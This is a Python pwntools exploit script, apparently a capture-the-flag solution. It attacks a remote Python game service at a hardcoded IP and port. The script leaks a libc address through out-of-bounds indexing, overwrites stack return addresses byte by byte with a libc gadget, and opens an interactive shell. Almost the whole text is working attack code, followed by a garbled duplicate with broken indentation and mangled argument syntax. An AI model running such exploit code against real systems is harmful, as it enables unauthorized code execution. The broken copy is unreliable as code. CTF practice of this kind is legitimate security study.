X3eRo0/exploit.py

## exploit.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn

BINARY = "./python3.10"
LIBC = "./libc.so.6"
LD = "/lib64/ld-linux-x86-64.so.2"

# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF(BINARY)
libc = pwn.ELF(LIBC)
ld = pwn.ELF(LD)
pwn.context.terminal = ["tmux", "splitw", "-h"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
p64 = pwn.p64
u64 = pwn.u64
p32 = pwn.p32
u32 = pwn.u32
p16 = pwn.p16
u16 = pwn.u16
p8 = pwn.p8
u8 = pwn.u8

host = pwn.args.HOST or "52.59.124.14"
# host = pwn.args.HOST or "localhost"
port = int(pwn.args.PORT or 10013)
# port = int(pwn.args.PORT or 9090)


def local(argv=[], *a, **kw):
    """Execute the target binary locally"""
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    """Connect to the process on the remote host"""
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    """Start the exploit against the target."""
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = """
set follow-fork-mode parent
continue
""".format(
    **locals()
)


def leak(io, index):
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    leak = []
    for i in range(8):
        io.sendlineafter(b"Index 1: ", b"%d" % 0)
        io.sendlineafter(b"Index 2: ", b"%d" % (index + i))
        after = [int(i) for i in io.recvline().strip().split(b"After: ")[1].split()]
        leak.append(after[0])

    leak = u64(bytes(leak))
    return leak


def swap(io, idx1, idx2):
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    for i in range(8):
        io.sendlineafter(b"Index 1: ", (b"%d\x00" + p64(5)) % (idx1 + i))
        io.sendlineafter(b"Index 2: ", (b"%d\x00" + p64(5)) % (idx2 + i))

    return 0


def write_byte(io, idx1, byte):
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    for i in range(8):
        io.sendlineafter(b"Index 1: ", (b"%d") % (idx1))
        io.sendlineafter(b"Index 2: ", (b"%d") % (byte))

    return 0


def exp(off):

    io = start(["game.py"])

    # ===========================================================
    #                    EXPLOIT GOES HERE
    # ===========================================================
    total_ok = 0x108
    total_ns = 0x130
    # # swap(io, 0x198, 0xffffff)
    # io.sendlineafter(b"Easy or Hard? ", b"hard")
    # io.sendlineafter(b"Ready? ", b"")
    # io.recvline()
    # for i in range(1):
    #     io.sendlineafter(b"Index 1: ", (b"%d") % (5))
    #     io.sendlineafter(b"Index 2: ", (b"%d") % (total_ok))
    #
    # for i in range(1):
    #     io.sendlineafter(b"Index 1: ", (b"%d") % (0))
    #     io.sendlineafter(b"Index 2: ", (b"%d") % (total_ns+4))

    # for i in range(0x100, 0x200, 8):
    #     print(hex(leak(io, i)))

    libc_leak = leak(io, 0x8C8)
    libc.address = libc_leak - 0x29E40
    pwn.info("libc: 0x%x\n" % libc.address)

    off = 0x50A43  # 1
    # off = 0x80C55  # 1
    # off = 0x80C50  # 2
    # off = 0x80C50  # 4
    win = libc.address + off
    # win = 0x414141414141

    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()

    # indexes of return addresses on the stack.
    ret_offs = [
        0xFFFFFF, # for debugging
        0x2D8,
        0x828,
        0x658,
        0x7F8,
        0x2F8,
        0x708,
        0x6D8,
        0x608,
        0x5D8,
        0x598,
        0x4F8,
    ]
    for i in range(8):
        io.sendlineafter(b"Index 1: ", (b"%d") % (ret_offs[1] + i))
        io.sendlineafter(b"Index 2: ", (b"%d") % ((win >> (i * 8)) & 0xFF))

    # print("offset: 0x%x" % off)
    # io.sendlineafter(b"Easy or Hard? ", b"asdf")
    io.interactive()
    io.close()


if __name__ == "__main__":
    exp(0)
	#!/usr/bin/env python
	# -- coding: utf-8 --

	# this exploit was generated via
	# 1) pwntools
	# 2) ctfmate

	import os
	import time
	import pwn

	BINARY = "./python3.10"
	LIBC = "./libc.so.6"
	LD = "/lib64/ld-linux-x86-64.so.2"

	# Set up pwntools for the correct architecture
	exe = pwn.context.binary = pwn.ELF(BINARY)
	libc = pwn.ELF(LIBC)
	ld = pwn.ELF(LD)
	pwn.context.terminal = ["tmux", "splitw", "-h"]
	pwn.context.delete_corefiles = True
	pwn.context.rename_corefiles = False
	p64 = pwn.p64
	u64 = pwn.u64
	p32 = pwn.p32
	u32 = pwn.u32
	p16 = pwn.p16
	u16 = pwn.u16
	p8 = pwn.p8
	u8 = pwn.u8

	host = pwn.args.HOST or "52.59.124.14"
	# host = pwn.args.HOST or "localhost"
	port = int(pwn.args.PORT or 10013)
	# port = int(pwn.args.PORT or 9090)


	def local(argv=[], a, *kw):
	"""Execute the target binary locally"""
	if pwn.args.GDB:
	return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, a, *kw)
	else:
	return pwn.process([exe.path] + argv, a, *kw)


	def remote(argv=[], a, *kw):
	"""Connect to the process on the remote host"""
	io = pwn.connect(host, port)
	if pwn.args.GDB:
	pwn.gdb.attach(io, gdbscript=gdbscript)
	return io


	def start(argv=[], a, *kw):
	"""Start the exploit against the target."""
	if pwn.args.LOCAL:
	return local(argv, a, *kw)
	else:
	return remote(argv, a, *kw)


	gdbscript = """
	set follow-fork-mode parent
	continue
	""".format(
	**locals()
	)


	def leak(io, index):
	io.sendlineafter(b"Easy or Hard? ", b"hard")
	io.sendlineafter(b"Ready? ", b"")
	io.recvline()
	leak = []
	for i in range(8):
	io.sendlineafter(b"Index 1: ", b"%d" % 0)
	io.sendlineafter(b"Index 2: ", b"%d" % (index + i))
	after = [int(i) for i in io.recvline().strip().split(b"After: ")[1].split()]
	leak.append(after[0])

	leak = u64(bytes(leak))
	return leak


	def swap(io, idx1, idx2):
	io.sendlineafter(b"Easy or Hard? ", b"hard")
	io.sendlineafter(b"Ready? ", b"")
	io.recvline()
	for i in range(8):
	io.sendlineafter(b"Index 1: ", (b"%d\x00" + p64(5)) % (idx1 + i))
	io.sendlineafter(b"Index 2: ", (b"%d\x00" + p64(5)) % (idx2 + i))

	return 0


	def write_byte(io, idx1, byte):
	io.sendlineafter(b"Easy or Hard? ", b"hard")
	io.sendlineafter(b"Ready? ", b"")
	io.recvline()
	for i in range(8):
	io.sendlineafter(b"Index 1: ", (b"%d") % (idx1))
	io.sendlineafter(b"Index 2: ", (b"%d") % (byte))

	return 0


	def exp(off):

	io = start(["game.py"])

	# ===========================================================
	# EXPLOIT GOES HERE
	# ===========================================================
	total_ok = 0x108
	total_ns = 0x130
	# # swap(io, 0x198, 0xffffff)
	# io.sendlineafter(b"Easy or Hard? ", b"hard")
	# io.sendlineafter(b"Ready? ", b"")
	# io.recvline()
	# for i in range(1):
	# io.sendlineafter(b"Index 1: ", (b"%d") % (5))
	# io.sendlineafter(b"Index 2: ", (b"%d") % (total_ok))
	#
	# for i in range(1):
	# io.sendlineafter(b"Index 1: ", (b"%d") % (0))
	# io.sendlineafter(b"Index 2: ", (b"%d") % (total_ns+4))

	# for i in range(0x100, 0x200, 8):
	# print(hex(leak(io, i)))

	libc_leak = leak(io, 0x8C8)
	libc.address = libc_leak - 0x29E40
	pwn.info("libc: 0x%x\n" % libc.address)

	off = 0x50A43 # 1
	# off = 0x80C55 # 1
	# off = 0x80C50 # 2
	# off = 0x80C50 # 4
	win = libc.address + off
	# win = 0x414141414141

	io.sendlineafter(b"Easy or Hard? ", b"hard")
	io.sendlineafter(b"Ready? ", b"")
	io.recvline()

	# indexes of return addresses on the stack.
	ret_offs = [
	0xFFFFFF, # for debugging
	0x2D8,
	0x828,
	0x658,
	0x7F8,
	0x2F8,
	0x708,
	0x6D8,
	0x608,
	0x5D8,
	0x598,
	0x4F8,
	]
	for i in range(8):
	io.sendlineafter(b"Index 1: ", (b"%d") % (ret_offs[1] + i))
	io.sendlineafter(b"Index 2: ", (b"%d") % ((win >> (i * 8)) & 0xFF))

	# print("offset: 0x%x" % off)
	# io.sendlineafter(b"Easy or Hard? ", b"asdf")
	io.interactive()
	io.close()


	if __name__ == "__main__":
	exp(0)